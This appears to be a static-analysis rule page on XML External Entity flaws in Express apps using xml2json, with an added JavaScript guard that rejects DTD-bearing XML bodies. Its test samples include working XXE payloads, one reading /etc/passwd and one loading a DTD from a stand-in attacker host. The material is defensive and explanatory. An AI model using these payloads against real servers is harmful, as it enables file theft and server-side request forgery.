Property
Language: javascript
Severity: medium
CWE: CWE-611: Improper Restriction of XML External Entity Reference
OWASP: A04:2017 - XML External Entities (XXE)
Confidence Level: Medium
Impact Level: Medium
Likelihood Level: Medium

Description

User-supplied data (for example a request body, query string or route parameter) is passed directly to the xml2json parser in your Express application without validation. An attacker who controls that XML can include a DTD with entity declarations, including external entities that reference local files or remote URLs, which is the basis of XML External Entity (XXE) attacks.

Impact

If exploited, attackers could read files that the Node.js process can access, perform server-side request forgery (SSRF) against internal services through entity URLs, or cause denial of service through recursive entity expansion. This could expose confidential information, compromise server integrity, or serve as a foothold for further attacks against your application or infrastructure.
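As an added example (not part of this rule page, and not xml2json's or Express's own code), the following shows a request guard that refuses any XML body carrying a DTD before the text reaches the parser, plus the size and encoding checks a practitioner would want alongside it. The function and sample names (checkXmlBody, xmlBodyGuard, runGuard, SAMPLES), the Express wiring shown in the comment, and the payloads are all assumptions constructed for this example.

```javascript
'use strict';

// Hypothetical hardening for the Express + xml2json pattern described above.
// Names (checkXmlBody, xmlBodyGuard, runGuard, SAMPLES) are assumptions for this example.

// Any DTD, and therefore any entity declaration, is rejected: entity expansion
// (external entities, recursive "billion laughs" payloads) is impossible without
// a DOCTYPE. Case-insensitive so odd spellings do not slip past; a DOCTYPE inside
// a comment or CDATA section is also refused, which fails in the safe direction.
const DTD_PATTERN = /<!(?:DOCTYPE|ENTITY)/i;

// Normalise the request body to a UTF-8 string and inspect it. Real XML parsers
// honour a UTF-16 BOM, so a regex run over raw bytes could be bypassed by a
// UTF-16 body; NUL bytes never occur in well-formed XML text, so any NUL is
// treated as grounds for refusal.
function checkXmlBody(body, { maxBytes = 1024 * 1024 } = {}) {
  if (typeof body !== 'string' && !Buffer.isBuffer(body)) {
    return { ok: false, reason: 'expected a raw XML text body' };
  }
  const buf = Buffer.isBuffer(body) ? body : Buffer.from(body, 'utf8');
  if (buf.length > maxBytes) {
    return { ok: false, reason: `XML body exceeds ${maxBytes} bytes` };
  }
  if (buf.includes(0)) {
    return { ok: false, reason: 'XML body contains NUL bytes (non-UTF-8 encoding?)' };
  }
  const xml = buf.toString('utf8');
  if (DTD_PATTERN.test(xml)) {
    return { ok: false, reason: 'XML body declares a DTD or entity' };
  }
  return { ok: true, xml };
}

// Express-style middleware. It only touches req, res and next, so it runs here
// without Express installed. The wiring below (assumed, not executed in this
// example) shows where the xml2json call from the rule description would sit:
//
//   app.post('/import',
//     express.text({ type: ['application/xml', 'text/xml'] }),
//     xmlBodyGuard({ maxBytes: 256 * 1024 }),
//     (req, res) => res.json(xml2json.toJson(req.xml)));
function xmlBodyGuard(options) {
  return function guard(req, res, next) {
    const result = checkXmlBody(req.body, options);
    if (!result.ok) {
      res.status(400).json({ error: result.reason });
      return;
    }
    req.xml = result.xml; // validated text: the only thing handed to the parser
    next();
  };
}

// Constructed sample bodies (not captured traffic).
const SAMPLES = {
  benign: '<?xml version="1.0"?><order><id>42</id><qty>3</qty></order>',
  fileRead:
    '<?xml version="1.0"?>\n' +
    '<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n' +
    '<order><id>&xxe;</id></order>',
  paramEntity:
    '<!DOCTYPE d [ <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd; ]><d/>',
  lowercase: '<!doctype d [ <!entity e "x"> ]><d>&e;</d>',
  utf16: Buffer.from('\ufeff<!DOCTYPE d [ <!ENTITY e "x"> ]><d/>', 'utf16le'),
};

// Minimal fake res/next so the guard can be exercised without Express.
function runGuard(body, options) {
  const res = {
    code: 200,
    status(c) { this.code = c; return this; },
    json(b) { this.body = b; return this; },
  };
  let passed = false;
  xmlBodyGuard(options)({ body }, res, () => { passed = true; });
  return { passed, code: res.code, body: res.body };
}

for (const [name, body] of Object.entries(SAMPLES)) {
  console.log(name, runGuard(body));
}
```

The guard deliberately rejects every DOCTYPE rather than trying to distinguish "safe" internal subsets from dangerous ones; legitimate API payloads rarely need a DTD, and a blanket refusal is far easier to reason about than an allowlist. Treat it as a pre-filter in front of the parser, not a replacement for disabling external entity resolution in the parser itself wherever the library you use exposes such a setting.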